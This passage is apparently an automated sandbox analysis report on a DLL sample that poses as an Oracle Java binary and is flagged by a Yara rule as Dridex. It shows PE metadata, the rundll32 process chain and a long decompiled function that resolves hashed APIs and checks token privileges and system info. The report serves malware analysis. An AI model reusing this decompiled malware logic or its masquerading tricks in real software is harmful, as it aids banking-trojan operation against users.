.rsrc	0x2c000	0x390	0x400	False	0.41796875	data	3.02156416239	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2d000	0x640	0x800	False	0.6357421875	data	5.25632437688	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x2c060	0x32c	data

Imports

DLL	Import
USER32.dll	DragDetect, TranslateMessage, EnumDisplayDevicesW, GetMenuState
KERNEL32.dll	GetSystemDefaultUILanguage, GetPriorityClass, GetModuleHandleW, OutputDebugStringA, LoadLibraryA, CloseHandle, LoadLibraryExA
WINTRUST.dll	CryptCATAdminCalcHashFromFileHandle
GDI32.dll	OffsetClipRgn
ADVAPI32.dll	RegLoadAppKeyW, CloseEncryptedFileRaw

Version Infos

Description	Data
LegalCopyright	Copyright 2018
InternalName	ofl
FileVersion	1.3.6923.00
Full Version	1.3.6_000-b00
CompanyName	Oracle Corporation
ProductName	Ofll(EH) Watgevae KT 8
ProductVersion	1.3.6923.00
FileDescription	Java(TM) Platform SE binary
OriginalFilename	ofl.dll
Translation	0x0000 0x04b0

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6220 Parent PID: 5616

General

Start time:	06:33:29
Start date:	13/05/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\4387387b_by_Libranalysis.dll'
Imagebase:	0x1200000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6228 Parent PID: 6220

General

Start time:	06:33:29
Start date:	13/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\4387387b_by_Libranalysis.dll',#1
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6252 Parent PID: 6228

General

Start time:	06:33:30
Start date:	13/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\4387387b_by_Libranalysis.dll',#1
Imagebase:	0xae0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 6252 Parent PID: 6228 rundll32.exeCOMMON

Executed Functions

Function 708D07CC, Relevance: 5.1, APIs: 3, Instructions: 628
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E708D07CC(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t152;
				void* _t155;
				signed char* _t156;
				char _t159;
				intOrPtr* _t163;
				void* _t177;
				intOrPtr _t186;
				char _t187;
				void* _t192;
				void* _t196;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t208;
				void* _t209;
				void* _t211;
				void* _t212;
				void* _t219;
				void* _t232;
				void* _t234;
				void* _t237;
				void* _t240;
				void* _t243;
				void* _t246;
				void* _t250;
				void* _t254;
				void* _t255;
				void* _t257;
				long _t258;
				void* _t261;
				void* _t264;
				int _t267;
				void* _t268;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t278;
				int _t280;
				intOrPtr* _t284;
				signed char _t288;
				signed char _t289;
				signed int _t293;
				void* _t314;
				void* _t319;
				void* _t355;
				void* _t364;
				void* _t369;
				void* _t374;
				void* _t375;
				void* _t376;
				void* _t377;
				void* _t378;
				void* _t379;
				void* _t385;
				void* _t392;
				signed int _t397;
				intOrPtr* _t400;
				void* _t403;
				signed int _t405;
				void* _t407;
				void* _t408;
				void* _t413;
				intOrPtr* _t417;
				void* _t419;
				void** _t421;
				void* _t422;
				void* _t423;
				void* _t424;

				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_t423 = _t422 - 0x1e0;
				_t407 = __ecx;
				_t152 =  *0x708dd1f8;
				if(_t152 == 0x16a9e13a) {
					_t152 = E708D3558(0x30);
					 *0x708dd1f8 = _t152;
				}
				if( *((char*)(_t152 + 0xb)) == 0 || _t407 != 0) {
					_t408 = _t423 + 0x48;
					E708D35D4(_t408, 0, 0x11c);
					_t424 = _t423 + 0xc;
					 *((intOrPtr*)(_t424 + 0x48)) = 0x11c;
					_t155 = E708D2F94(0x4bcc7cba, 0xa7920a3, 0x4bcc7cba, 0x4bcc7cba);
					if(_t155 == 0) {
						_t395 =  *0x708dd1f8;
						_t156 = _t424 + 0x4c;
						_t288 =  *_t156;
						 *(_t395 + 8) = _t288;
						_t289 = _t156[4];
						 *(_t395 + 9) = _t289;
						__eflags = _t156[0x116] - 1;
						_t389 =  *(_t424 + 0x54);
						 *((char*)(_t395 + 0xa)) = _t156[0x110];
						 *(_t395 + 4) =  *(_t424 + 0x54);
						 *((char*)(_t395 + 0xc)) = 0 | _t156[0x116] != 0x00000001;
						 *_t395 = (_t289 & 0x000000ff) + ((_t288 & 0x000000ff) << 4) - 0x50;
						_t159 = E708D1094(_t395);
						 *(_t424 + 0x198) = 0;
						 *((char*)( *0x708dd1f8 + 0xb)) = _t159;
						_t355 = E708D2F94(0xd0443458, 0xd8ece5ad, _t159, _t159);
						__eflags = _t355;
						if(_t355 == 0) {
							L12:
							__eflags = 0;
							 *((char*)( *0x708dd1f8 + 0x28)) = 0;
							_t163 = E708D07CC(0x708dd1f8, 0, _t389, _t395);
							__eflags =  *_t163 - 0x10;
							if( *_t163 >= 0x10) {
								_t293 = 6;
								memcpy(_t424 + 0x164, 0x708dbc80, _t293 << 2);
								_t424 = _t424 + 0xc;
								_t392 = 0x708dbc80 + _t293 + _t293;
								 *((intOrPtr*)(_t424 + 0x1c)) = 0;
								E708CF620(_t424 + 0x24, 0);
								_t397 = 0;
								__eflags = 0;
								do {
									E708CF8C4(_t424 + 0x24, E708CF568(_t424 + 0x20) + 4);
									 *((intOrPtr*)(E708CF558(_t424 + 0x24, E708CF568(_t424 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t424 + 0x164 + _t397 * 4));
									_t397 = _t397 + 1;
									 *((intOrPtr*)(_t424 + 0x1c)) =  *((intOrPtr*)(_t424 + 0x1c)) + 1;
									__eflags = _t397 - 6;
								} while (_t397 < 6);
								_push(0);
								E708D54EC(_t424 + 0xc, _t424 + 0x1c, 0x80000002);
								E708CF6F0(_t424 + 0x20);
								E708D551C(_t424 + 8, _t424 + 0x1c0, 0x5411b30);
								_t177 = E708D57D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c0)));
								_t398 = _t177;
								E708CE054(_t424 + 0x1c0);
								__eflags = _t177;
								if(_t177 != 0) {
									E708D551C(_t424 + 8, _t424 + 0x1c8, 0xdb1d9b48);
									_t413 = E708D57D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c8)));
									E708CE054(_t424 + 0x1c8);
									_t398 = _t424 + 0x1d0;
									E708D551C(_t424 + 8, _t424 + 0x1d0, 0xf3453dd0);
									_t392 = E708D57D0(_t424 + 4, __eflags,  *(_t424 + 0x1d0));
									E708CE054(_t424 + 0x1d0);
									__eflags = _t413;
									if(_t413 != 0) {
										__eflags = _t413 - 5;
										if(_t413 != 5) {
											__eflags = _t413 - 2;
											if(_t413 != 2) {
												goto L58;
											} else {
												__eflags = _t392 - 1;
												if(_t392 != 1) {
													goto L58;
												} else {
													E708CD098(_t424 + 0xc);
													__eflags =  *((char*)(_t424 + 8));
													if( *((char*)(_t424 + 8)) != 0) {
														_t375 =  *(_t424 + 4);
														__eflags = _t375;
														if(_t375 == 0) {
															L53:
															_t237 = 1;
														} else {
															__eflags = _t375 - 0xffffffff;
															if(_t375 != 0xffffffff) {
																_t237 = 0;
																__eflags = 0;
															} else {
																goto L53;
															}
														}
														__eflags = _t237;
														if(_t237 == 0) {
															E708D54C4(_t375);
														}
													}
													 *(_t424 + 4) = 0;
													_t186 = 5;
												}
											}
										} else {
											__eflags = _t392;
											if(_t392 != 0) {
												__eflags = _t392 - 1;
												if(_t392 == 1) {
													E708CD098(_t424 + 0xc);
													__eflags =  *((char*)(_t424 + 8));
													if( *((char*)(_t424 + 8)) != 0) {
														_t376 =  *(_t424 + 4);
														__eflags = _t376;
														if(_t376 == 0) {
															L108:
															_t240 = 1;
														} else {
															__eflags = _t376 - 0xffffffff;
															if(_t376 != 0xffffffff) {
																_t240 = 0;
																__eflags = 0;
															} else {
																goto L108;
															}
														}
														__eflags = _t240;
														if(_t240 == 0) {
															E708D54C4(_t376);
														}
													}
													 *(_t424 + 4) = 0;
													_t186 = 4;
												} else {
													goto L58;
												}
											} else {
												E708CD098(_t424 + 0xc);
												__eflags =  *((char*)(_t424 + 8));
												if( *((char*)(_t424 + 8)) != 0) {
													_t377 =  *(_t424 + 4);
													__eflags = _t377;
													if(_t377 == 0) {
														L41:
														_t243 = 1;
													} else {
														__eflags = _t377 - 0xffffffff;
														if(_t377 != 0xffffffff) {
															_t243 = 0;
															__eflags = 0;
														} else {
															goto L41;
														}
													}
													__eflags = _t243;
													if(_t243 == 0) {
														E708D54C4(_t377);
													}
												}
												 *(_t424 + 4) = 0;
												_t186 = 3;
											}
										}
									} else {
										__eflags = _t392;
										if(_t392 != 0) {
											L58:
											E708CD098(_t424 + 0xc);
											__eflags =  *((char*)(_t424 + 8));
											if( *((char*)(_t424 + 8)) != 0) {
												_t374 =  *(_t424 + 4);
												__eflags = _t374;
												if(_t374 == 0) {
													L61:
													_t234 = 1;
												} else {
													__eflags = _t374 - 0xffffffff;
													if(_t374 != 0xffffffff) {
														_t234 = 0;
														__eflags = 0;
													} else {
														goto L61;
													}
												}
												__eflags = _t234;
												if(_t234 == 0) {
													E708D54C4(_t374);
												}
											}
											_t186 = 0;
											__eflags = 0;
											 *(_t424 + 4) = 0;
										} else {
											E708CD098(_t424 + 0xc);
											__eflags =  *((char*)(_t424 + 8));
											if( *((char*)(_t424 + 8)) != 0) {
												_t378 =  *(_t424 + 4);
												__eflags = _t378;
												if(_t378 == 0) {
													L31:
													_t246 = 1;
												} else {
													__eflags = _t378 - 0xffffffff;
													if(_t378 != 0xffffffff) {
														_t246 = 0;
														__eflags = 0;
													} else {
														goto L31;
													}
												}
												__eflags = _t246;
												if(_t246 == 0) {
													E708D54C4(_t378);
												}
											}
											 *(_t424 + 4) = 0;
											_t186 = 2;
										}
									}
								} else {
									E708CD098(_t424 + 0xc);
									__eflags =  *((char*)(_t424 + 8));
									if( *((char*)(_t424 + 8)) != 0) {
										_t379 =  *(_t424 + 4);
										__eflags = _t379;
										if(_t379 == 0) {
											L21:
											_t250 = 1;
										} else {
											__eflags = _t379 - 0xffffffff;
											if(_t379 != 0xffffffff) {
												_t250 = 0;
												__eflags = 0;
											} else {
												goto L21;
											}
										}
										__eflags = _t250;
										if(_t250 == 0) {
											E708D54C4(_t379);
										}
									}
									 *(_t424 + 4) = 0;
									_t186 = 1;
								}
							} else {
								_t186 = 1;
							}
							 *((intOrPtr*)( *0x708dd1f8 + 0x24)) = _t186;
							_t187 = E708D10CC(0xffffffffffffffff);
							_t314 =  *0x708dd1f8;
							 *((char*)(_t314 + 0x29)) = _t187;
							__eflags =  *_t314 - 0x10;
							 *((intOrPtr*)(_t314 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t314 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x708dd1f8 + 0x2c)) = E708D1140(0xffffffffffffffff, _t392, _t398);
								goto L78;
							} else {
								 *(_t424 + 0x19c) = 0;
								_t364 = E708D2F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
								__eflags = _t364;
								if(_t364 == 0) {
									L74:
									_t196 =  *0x708dd1f8;
									__eflags =  *((char*)(_t196 + 0x28));
									if( *((char*)(_t196 + 0x28)) == 0) {
										 *((intOrPtr*)(_t196 + 0x2c)) = 3;
									} else {
										 *((intOrPtr*)(_t196 + 0x2c)) = 5;
									}
									goto L78;
								} else {
									_t198 =  *_t364(0xffffffff, 8, _t424 + 0x19c);
									__eflags = _t198;
									if(_t198 == 0) {
										_t199 = E708D352C(_t398);
										__eflags = _t199;
										if(_t199 != 0) {
											goto L74;
										} else {
											goto L69;
										}
									} else {
										L69:
										 *(_t424 + 0x30) =  *(_t424 + 0x19c);
										 *((char*)(_t424 + 0x34)) = 1;
										 *(_t424 + 0x1a4) = 0;
										_t319 = E708D2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
										__eflags = _t319;
										if(_t319 != 0) {
											_t232 =  *_t319( *(_t424 + 0x1ac), 1, 0, 0, _t424 + 0x1a4);
											__eflags = _t232;
											if(_t232 == 0) {
												E708D352C(_t398);
											}
										}
										_t202 =  *(_t424 + 0x1a4);
										__eflags = _t202;
										if(_t202 != 0) {
											E708CF620(_t424 + 0x18c, _t202);
											_t403 = E708D2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
											__eflags = _t403;
											if(_t403 == 0) {
												L124:
												E708CF6F0(_t424 + 0x188);
												goto L72;
											} else {
												_t208 = E708CF558(_t424 + 0x18c, 0);
												_t209 = E708CF568(_t424 + 0x188);
												_t211 =  *_t403( *(_t424 + 0x1ac), 1, _t208, _t209, _t424 + 0x1a4);
												__eflags = _t211;
												if(_t211 == 0) {
													_t212 = E708D352C(_t403);
													__eflags = _t212;
													if(_t212 != 0) {
														goto L124;
													} else {
														goto L116;
													}
												} else {
													L116:
													_t417 = E708CF558(_t424 + 0x18c, 0);
													E708CDFFC(_t424 + 0x1b4, 0);
													 *(_t424 + 0x1ac) = 0;
													_t369 = E708D2F94(0xd0443458, 0x39521505, 0xd0443458, 0xd0443458);
													__eflags = _t369;
													if(_t369 != 0) {
														 *_t369( *_t417, _t424 + 0x1ac);
													}
													E708CE070(_t424 + 0x1b4,  *(_t424 + 0x1ac));
													_t219 = E708D2F94(0x4bcc7cba, 0x1f221433, 0x4bcc7cba, 0x4bcc7cba);
													__eflags = _t219;
													if(_t219 == 0) {
														E708CE11C(_t424 + 0x1b8 - 8, _t424 + 0x1b8);
														_t419 = E708D4BE0( *((intOrPtr*)(_t424 + 0x1b8)), E708CE94C( *((intOrPtr*)(_t424 + 0x1b8)), 0x7fffffff));
														E708CE054(_t424 + 0x1b8);
														E708CE054(_t424 + 0x1b0);
														E708CF6F0(_t424 + 0x188);
														__eflags =  *((char*)(_t424 + 0x34));
														if( *((char*)(_t424 + 0x34)) != 0) {
															E708CBC00(_t424 + 0x30);
														}
														__eflags = _t419 - 0x6df4cf7;
														if(_t419 != 0x6df4cf7) {
															goto L74;
														} else {
															 *((intOrPtr*)( *0x708dd1f8 + 0x2c)) = 6;
															L78:
															_t192 = E708D2F94(0x4bcc7cba, 0x57154e4e, 0x4bcc7cba, 0x4bcc7cba);
															__eflags = _t192;
															if(_t192 != 0) {
																GetSystemInfo(_t424 + 0x164); // executed
															}
															_t152 =  *0x708dd1f8;
															_t284 = _t424 + 0x178;
															_t400 = _t424 + 0x170;
															 *((short*)(_t152 + 0xe)) =  *_t284;
															 *((intOrPtr*)(_t152 + 0x10)) =  *((intOrPtr*)(_t284 - 0x10));
															 *((intOrPtr*)(_t152 + 0x14)) =  *((intOrPtr*)(_t284 - 0xc));
															 *((intOrPtr*)(_t152 + 0x18)) =  *_t400;
															 *((intOrPtr*)(_t152 + 0x1c)) =  *((intOrPtr*)(_t400 + 0x10));
															goto L81;
														}
													} else {
														_push( *(_t424 + 0x1ac));
														asm("int3");
														return _t219;
													}
												}
											}
										} else {
											L72:
											__eflags =  *((char*)(_t424 + 0x34));
											if( *((char*)(_t424 + 0x34)) != 0) {
												E708CBC00(_t424 + 0x30);
											}
											goto L74;
										}
									}
								}
							}
						} else {
							_t254 =  *_t355(0xffffffff, 8, _t424 + 0x198);
							__eflags = _t254;
							if(_t254 == 0) {
								_t255 = E708D352C(_t395);
								__eflags = _t255;
								if(_t255 != 0) {
									goto L12;
								} else {
									goto L7;
								}
							} else {
								L7:
								 *(_t424 + 0x14) =  *(_t424 + 0x198);
								 *((char*)(_t424 + 0x18)) = 1;
								 *(_t424 + 0x1a0) = 0;
								_t257 = E708D2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
								__eflags = _t257;
								if(_t257 != 0) {
									_t280 = GetTokenInformation( *(_t424 + 0x1a8), 2, 0, 0, _t424 + 0x1a0); // executed
									__eflags = _t280;
									if(_t280 == 0) {
										E708D352C(_t395);
									}
								}
								_t258 =  *(_t424 + 0x1a0);
								__eflags = _t258;
								if(_t258 != 0) {
									E708CF620(_t424 + 0x3c, _t258);
									_t261 = E708D2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
									_t395 = _t261;
									__eflags = _t261;
									if(_t261 == 0) {
										L98:
										E708CF6F0(_t424 + 0x38);
										goto L10;
									} else {
										_t264 = E708CF558(_t424 + 0x3c, 0);
										_t267 = GetTokenInformation( *(_t424 + 0x1a8), 2, _t264, E708CF568(_t424 + 0x38), _t424 + 0x1a0); // executed
										__eflags = _t267;
										if(_t267 == 0) {
											_t268 = E708D352C(_t395);
											__eflags = _t268;
											if(_t268 != 0) {
												goto L98;
											} else {
												goto L85;
											}
										} else {
											L85:
											_t421 = E708CF558(_t424 + 0x3c, 0);
											_t389 = _t424 + 0x1d8;
											 *(_t424 + 0x1d8 - 0x30) = 0;
											asm("movsd");
											asm("movsb");
											asm("movsb");
											_t395 = E708D2F94(0xd0443458, 0xe6199b6e, 0xd0443458, 0xd0443458);
											__eflags = _t395;
											if(_t395 == 0) {
												goto L98;
											} else {
												_t272 = _t424 + 0x1a8;
												_t273 =  *_t395(_t272 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t272);
												__eflags = _t273;
												if(_t273 == 0) {
													_t274 = E708D352C(_t395);
													__eflags = _t274;
													if(_t274 != 0) {
														goto L98;
													} else {
														goto L87;
													}
												} else {
													L87:
													_t389 =  *(_t424 + 0x1a8);
													__eflags =  *_t421;
													if( *_t421 <= 0) {
														L92:
														__eflags = _t389;
														if(_t389 == 0) {
															L94:
															_t385 = 1;
														} else {
															__eflags = _t389 - 0xffffffff;
															if(_t389 != 0xffffffff) {
																_t385 = 0;
																__eflags = 0;
															} else {
																goto L94;
															}
														}
														__eflags = _t385;
														if(_t385 == 0) {
															E708D1070(_t389, _t395, _t389);
														}
														goto L98;
													} else {
														_t405 = 0;
														__eflags = 0;
														while(1) {
															_t278 = E708D2F94(0xd0443458, 0x713d44b5, 0xd0443458, 0xd0443458);
															__eflags = _t278;
															if(_t278 != 0) {
																break;
															}
															_t405 = _t405 + 1;
															__eflags = _t405 -  *_t421;
															if(_t405 <  *_t421) {
																continue;
															} else {
																goto L92;
															}
															goto L130;
														}
														_push( *((intOrPtr*)(_t421 + 4 + _t405 * 8)));
														_push( *(_t424 + 0x1ac));
														asm("int3");
														return _t278;
													}
												}
											}
										}
									}
								} else {
									L10:
									__eflags =  *((char*)(_t424 + 0x18));
									if( *((char*)(_t424 + 0x18)) != 0) {
										E708CBC00(_t424 + 0x14);
									}
									goto L12;
								}
							}
						}
					} else {
						_push(_t408);
						asm("int3");
						return _t155;
					}
				} else {
					L81:
					return _t152;
				}
				L130:
			}

0x708d07cc
0x708d07cd
0x708d07ce
0x708d07d0
0x708d07db
0x708d07dd
0x708d07e4
0x708d1063
0x708d1069
0x708d1069
0x708d07ee
0x708d07fa
0x708d0806
0x708d080b
0x708d0818
0x708d0822
0x708d0829
0x708d082e
0x708d0832
0x708d0836
0x708d083b
0x708d083e
0x708d0844
0x708d084a
0x708d0857
0x708d085e
0x708d0865
0x708d0868
0x708d086b
0x708d086d
0x708d0879
0x708d0886
0x708d0893
0x708d0895
0x708d0897
0x708d0923
0x708d0923
0x708d0929
0x708d092c
0x708d0931
0x708d0934
0x708d094c
0x708d094d
0x708d094d
0x708d094d
0x708d0951
0x708d095a
0x708d095f
0x708d095f
0x708d0961
0x708d0972
0x708d0994
0x708d0996
0x708d0997
0x708d099b
0x708d099b
0x708d09a4
0x708d09b0
0x708d09b9
0x708d09cf
0x708d09df
0x708d09e4
0x708d09e8
0x708d09ed
0x708d09ef
0x708d0a3f
0x708d0a54
0x708d0a58
0x708d0a5d
0x708d0a6e
0x708d0a83
0x708d0a87
0x708d0a8c
0x708d0a8e
0x708d0ad5
0x708d0ad8
0x708d0b26
0x708d0b29
0x00000000
0x708d0b2b
0x708d0b2b
0x708d0b2e
0x00000000
0x708d0b30
0x708d0b34
0x708d0b39
0x708d0b3e
0x708d0b40
0x708d0b44
0x708d0b46
0x708d0b4d
0x708d0b4d
0x708d0b48
0x708d0b48
0x708d0b4b
0x708d0b51
0x708d0b51
0x00000000
0x00000000
0x00000000
0x708d0b4b
0x708d0b53
0x708d0b55
0x708d0b58
0x708d0b58
0x708d0b55
0x708d0b5d
0x708d0b67
0x708d0b67
0x708d0b2e
0x708d0ada
0x708d0ada
0x708d0adc
0x708d0b1b
0x708d0b1e
0x708d0e90
0x708d0e95
0x708d0e9a
0x708d0e9c
0x708d0ea0
0x708d0ea2
0x708d0ea9
0x708d0ea9
0x708d0ea4
0x708d0ea4
0x708d0ea7
0x708d0ead
0x708d0ead
0x00000000
0x00000000
0x00000000
0x708d0ea7
0x708d0eaf
0x708d0eb1
0x708d0eb4
0x708d0eb4
0x708d0eb1
0x708d0eb9
0x708d0ec3
0x708d0b24
0x00000000
0x708d0b24
0x708d0ade
0x708d0ae2
0x708d0ae7
0x708d0aec
0x708d0aee
0x708d0af2
0x708d0af4
0x708d0afb
0x708d0afb
0x708d0af6
0x708d0af6
0x708d0af9
0x708d0aff
0x708d0aff
0x00000000
0x00000000
0x00000000
0x708d0af9
0x708d0b01
0x708d0b03
0x708d0b06
0x708d0b06
0x708d0b03
0x708d0b0b
0x708d0b15
0x708d0b15
0x708d0adc
0x708d0a90
0x708d0a90
0x708d0a92
0x708d0b6a
0x708d0b6e
0x708d0b73
0x708d0b78
0x708d0b7a
0x708d0b7e
0x708d0b80
0x708d0b87
0x708d0b87
0x708d0b82
0x708d0b82
0x708d0b85
0x708d0b8b
0x708d0b8b
0x00000000
0x00000000
0x00000000
0x708d0b85
0x708d0b8d
0x708d0b8f
0x708d0b92
0x708d0b92
0x708d0b8f
0x708d0b97
0x708d0b97
0x708d0b99
0x708d0a98
0x708d0a9c
0x708d0aa1
0x708d0aa6
0x708d0aa8
0x708d0aac
0x708d0aae
0x708d0ab5
0x708d0ab5
0x708d0ab0
0x708d0ab0
0x708d0ab3
0x708d0ab9
0x708d0ab9
0x00000000
0x00000000
0x00000000
0x708d0ab3
0x708d0abb
0x708d0abd
0x708d0ac0
0x708d0ac0
0x708d0abd
0x708d0ac5
0x708d0acf
0x708d0acf
0x708d0a92
0x708d09f1
0x708d09f5
0x708d09fa
0x708d09ff
0x708d0a01
0x708d0a05
0x708d0a07
0x708d0a0e
0x708d0a0e
0x708d0a09
0x708d0a09
0x708d0a0c
0x708d0a12
0x708d0a12
0x00000000
0x00000000
0x00000000
0x708d0a0c
0x708d0a14
0x708d0a16
0x708d0a19
0x708d0a19
0x708d0a16
0x708d0a1e
0x708d0a28
0x708d0a28
0x708d0936
0x708d0938
0x708d0938
0x708d0ba2
0x708d0ba5
0x708d0baa
0x708d0bac
0x708d0bb5
0x708d0bc1
0x708d0bc4
0x708d0c92
0x708d0c9a
0x00000000
0x708d0bca
0x708d0bd4
0x708d0be6
0x708d0be8
0x708d0bea
0x708d0c76
0x708d0c76
0x708d0c78
0x708d0c7c
0x708d0c87
0x708d0c7e
0x708d0c7e
0x708d0c7e
0x00000000
0x708d0bf0
0x708d0bfc
0x708d0bfe
0x708d0c00
0x708d104f
0x708d1054
0x708d1056
0x00000000
0x708d105c
0x00000000
0x708d105c
0x708d0c06
0x708d0c06
0x708d0c17
0x708d0c1b
0x708d0c20
0x708d0c32
0x708d0c34
0x708d0c36
0x708d0c4d
0x708d0c4f
0x708d0c51
0x708d0ec9
0x708d0ec9
0x708d0c51
0x708d0c57
0x708d0c5e
0x708d0c60
0x708d0edb
0x708d0ef1
0x708d0ef3
0x708d0ef5
0x708d1030
0x708d1037
0x00000000
0x708d0efb
0x708d0f04
0x708d0f12
0x708d0f2c
0x708d0f2e
0x708d0f30
0x708d1041
0x708d1046
0x708d1048
0x00000000
0x708d104a
0x00000000
0x708d104a
0x708d0f36
0x708d0f36
0x708d0f44
0x708d0f4f
0x708d0f5e
0x708d0f70
0x708d0f72
0x708d0f74
0x708d0f81
0x708d0f81
0x708d0f91
0x708d0fa2
0x708d0fa7
0x708d0fa9
0x708d0fbf
0x708d0fe0
0x708d0fe9
0x708d0ff5
0x708d1001
0x708d1006
0x708d100b
0x708d1011
0x708d1011
0x708d1016
0x708d101c
0x00000000
0x708d1022
0x708d1024
0x708d0c9d
0x708d0ca9
0x708d0cb0
0x708d0cb2
0x708d0cbc
0x708d0cbc
0x708d0cbe
0x708d0cc0
0x708d0ccf
0x708d0cdb
0x708d0cdf
0x708d0ce2
0x708d0ce5
0x708d0ce8
0x00000000
0x708d0ce8
0x708d0fab
0x708d0fab
0x708d0fb2
0x708d0fb3
0x708d0fb3
0x708d0fa9
0x708d0f30
0x708d0c66
0x708d0c66
0x708d0c66
0x708d0c6b
0x708d0c71
0x708d0c71
0x00000000
0x708d0c6b
0x708d0c60
0x708d0c00
0x708d0bea
0x708d089d
0x708d08a9
0x708d08ab
0x708d08ad
0x708d0e7a
0x708d0e7f
0x708d0e81
0x00000000
0x708d0e87
0x00000000
0x708d0e87
0x708d08b3
0x708d08b3
0x708d08c4
0x708d08c8
0x708d08cd
0x708d08da
0x708d08e1
0x708d08e3
0x708d08fa
0x708d08fc
0x708d08fe
0x708d0cf6
0x708d0cf6
0x708d08fe
0x708d0904
0x708d090b
0x708d090d
0x708d0d05
0x708d0d16
0x708d0d1b
0x708d0d1d
0x708d0d1f
0x708d0e50
0x708d0e54
0x00000000
0x708d0d25
0x708d0d2b
0x708d0d50
0x708d0d52
0x708d0d54
0x708d0e6c
0x708d0e71
0x708d0e73
0x00000000
0x708d0e75
0x00000000
0x708d0e75
0x708d0d5a
0x708d0d5a
0x708d0d65
0x708d0d6c
0x708d0d73
0x708d0d7a
0x708d0d7b
0x708d0d7c
0x708d0d8e
0x708d0d90
0x708d0d92
0x00000000
0x708d0d98
0x708d0d9a
0x708d0db5
0x708d0db7
0x708d0db9
0x708d0e5e
0x708d0e63
0x708d0e65
0x00000000
0x708d0e67
0x00000000
0x708d0e67
0x708d0dbf
0x708d0dbf
0x708d0dbf
0x708d0dc6
0x708d0dca
0x708d0e35
0x708d0e35
0x708d0e37
0x708d0e3e
0x708d0e3e
0x708d0e39
0x708d0e39
0x708d0e3c
0x708d0e42
0x708d0e42
0x00000000
0x00000000
0x00000000
0x708d0e3c
0x708d0e44
0x708d0e46
0x708d0e4b
0x708d0e4b
0x00000000
0x708d0dcc
0x708d0dcc
0x708d0dcc
0x708d0dce
0x708d0dda
0x708d0ddf
0x708d0de1
0x00000000
0x00000000
0x708d0e2f
0x708d0e30
0x708d0e33
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x708d0e33
0x708d0de3
0x708d0de7
0x708d0dee
0x708d0def
0x708d0def
0x708d0dca
0x708d0db9
0x708d0d92
0x708d0d54
0x708d0913
0x708d0913
0x708d0913
0x708d0918
0x708d091e
0x708d091e
0x00000000
0x708d0918
0x708d090d
0x708d08ad
0x708d082b
0x708d082b
0x708d082c
0x708d082d
0x708d082d
0x708d0ceb
0x708d0ceb
0x708d0cf5
0x708d0cf5
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,D0443458,D0443458), ref: 708D08FA
GetSystemInfo.KERNELBASE(?,4BCC7CBA,4BCC7CBA,?,?,F3453DD0,?,?,DB1D9B48,?,?,05411B30,00000000,80000002,00000000,-000000FC), ref: 708D0CBC
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,D0443458,D0443458,00000000,D0443458,D0443458), ref: 708D0D50

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: 7963b640091bc386514f1adee717f431b6f66ac1aa5899139ec8c23f3c331b42
Instruction ID: 8e4c918f8988963e85acfa07f9eab6dfeb4ce1d8e653e0bf074f91514fc3d832
